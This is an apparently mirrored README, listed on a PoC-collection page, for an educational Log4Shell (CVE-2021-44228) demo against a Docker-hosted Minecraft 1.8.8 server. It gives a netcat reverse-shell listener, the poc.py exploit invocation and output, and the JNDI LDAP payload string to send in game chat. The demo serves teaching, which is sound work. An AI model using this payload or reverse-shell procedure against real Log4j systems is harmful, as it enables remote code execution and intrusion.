Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-44228 PoC — Apache Log4j 代码问题漏洞

Source
https://github.com/felixslama/log4shell-minecraft-demo
Associated Vulnerability
Title:Apache Log4j 代码问题漏洞 (CVE-2021-44228)
Description:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
Description
Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs
Readme
# Log4Shell (CVE-2021-44228) minecraft demo
This demo is used at education fairs to give potential future students an idea of the cybersecurity department at HTL Villach and on how everyday applications can be exploited


**Note:** This entire demo uses Minecraft 1.8.8
## Attacker
The attacker in this scenario is using the PoC by kozmer. https://github.com/kozmer/log4j-shell-poc
All credit belongs to them. 
**Note:** All commands need to be executed in attacker/

#### Requirements:
```bash
pip install -r requirements.txt
```
#### Usage:


* Start a netcat listener to accept reverse shell connection.<br>
```py
nc -lvnp 9001
```
* Launch the exploit.<br>
**Note:** For this to work, the extracted java archive has to be named: `jdk1.8.0_20`, and be in the same directory. 
```py
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389
```


This script will setup the HTTP server and the LDAP server for you, and it will also create the payload that you can use to paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

<br>

## Victim
On the victim instance we are using an outdated and therefore [vulnerable version of JDK (jdk1.8.0_20) ](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).

#### Initial setup


To get our Minecraft server running we have to build our Docker image and run it.

**Note:** For a successful build you need to obtain your own copy of the Minecraft Vanilla 1.8.8 Server *(can't be shared because of Mojang's EULA)*
A possible source could be [MCVERSIONS.NET](https://mcversions.net/download/1.8.8)

After obtaining the file save it in victim/ as server.jar 

```docker
cd target/
docker build target/ -t minecraft-demo
```

#### Running the vulnerable server
Run the vulnerable Minecraft server we just built using docker
```
docker run --name vulnerable-server -p 25565:25565 minecraft-demo
```
It's likely that your container freezes or gets stuck after exploitation. In that case you can kill it using the following command:
```
docker kill vulnerable-server
```

#### Exploiting the server

To exploit the vulnerabilty simply send the string provided by the *poc.py* in the game chat.
```
${jndi:ldap://<ip of docker-host>:1389/a}
```
![image](https://github.com/felixslama/log4shell-minecraft-demo/assets/79058712/b3cc9c19-ca14-456c-bf7f-7246bb6adf58)
File Snapshot

 [4.0K]  /data/pocs/6963bb0571419f1998cec29856192d6dda3c7412
├── [4.0K]  attacker
│   ├── [4.1K]  poc.py
│   ├── [  17]  requirements.txt
│   └── [4.0K]  target
│       ├── [1.8M]  log4shell-1.0-SNAPSHOT.war
│       └── [ 41M]  marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1.0K]  LICENSE
├── [2.6K]  README.md
└── [4.0K]  victim
    └── [ 295]  Dockerfile

3 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.